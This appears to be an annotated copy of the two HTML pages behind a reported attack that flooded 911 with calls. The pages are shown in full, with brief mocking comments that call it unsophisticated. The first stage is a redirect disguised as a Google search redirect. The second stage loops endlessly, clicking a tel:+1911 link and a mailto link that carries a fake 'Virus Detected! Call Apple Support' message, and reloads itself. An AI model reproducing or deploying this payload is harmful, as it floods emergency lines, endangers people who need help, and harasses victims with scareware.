meetdesai

+&cd=2&hl=en&ct=clnk&gl=us.html

<!-- Stage 2: payload from meetdesai.com/ipas/+&cd=2&hl=en&ct=clnk&gl=us
     this is the stage that either calls folks, or opens mails to desai, or both. -->
<h1>LOLOLOLOLOLOLOL</h1>
<a href="tel:+1911" id="tel"></a>
<a href="mailto:[email protected]?subject=Virus Detected!&body=We detected a Virus on your device! Call Apple Support now!" id="mail"></a>

<script>
  for(i=0;i<10100101010010101001010100101001010;++i){
    document.getElementById("tel").click(); document.getElementById("mail").click();
    window.location = window.location;
  }
</script>
<!-- end Stage 2 -->

ipas.html

<!-- Maricopa County Sheriff's Office calls this a sophisticated cyber attack:
	 http://www.abc15.com/news/region-phoenix-metro/central-phoenix/mcso-arrests-suspect-in-911-cyber-attack

	 This is not a sophisticated cyber attack. -->

<!-- Stage 1: payload from meetdesai.com/ipas -->
	 this is the initial page which forwards the user to a second stage with a strange URL -->
<script>window.googleJavaScriptRedirect=1</script>
<script>
  var n={
    navigateTo:function(b,a,d){
        if(b!=a&&b.google){
            if(b.google.r){
                b.google.r=0;
                b.location.href=d;
                a.location.replace("about:blank");
            }
        } else {
            a.location.replace(d);
        }
    }
  };
  n.navigateTo(window.parent,window,"http://meetdesai.com/ipas/+\x26cd\x3d2\x26hl\x3den\x26ct\x3dclnk\x26gl\x3dus");
</script>
<noscript>
  <META http-equiv="refresh" content="0;URL='http://meetdesai.com/ipas/+&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us'">
</noscript>
<!-- end Stage 1 -->